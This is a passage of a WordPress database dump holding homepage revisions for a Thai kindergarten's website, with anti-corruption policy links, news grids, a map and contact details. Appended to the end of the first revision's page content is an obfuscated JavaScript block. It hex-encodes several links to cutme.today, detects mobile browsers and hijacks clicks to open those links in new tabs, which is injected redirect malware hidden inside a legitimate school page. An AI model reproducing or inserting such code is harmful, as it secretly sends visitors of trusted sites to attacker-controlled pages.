{\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 21:52:40','2024-07-27 14:52:40','',19,'http://watprato.ssk.in.th/?p=82',0,'revision','',0),
(83,1,'2024-07-27 21:53:01','2024-07-27 14:53:01','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:video {\"id\":79,\"align\":\"full\"} -->\n<figure class=\"wp-block-video alignfull\"><video autoplay controls loop src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/อนุบาลวัดพระโต.mp4\"></video></figure>\n<!-- /wp:video -->\n\n<!-- wp:generateblocks/container 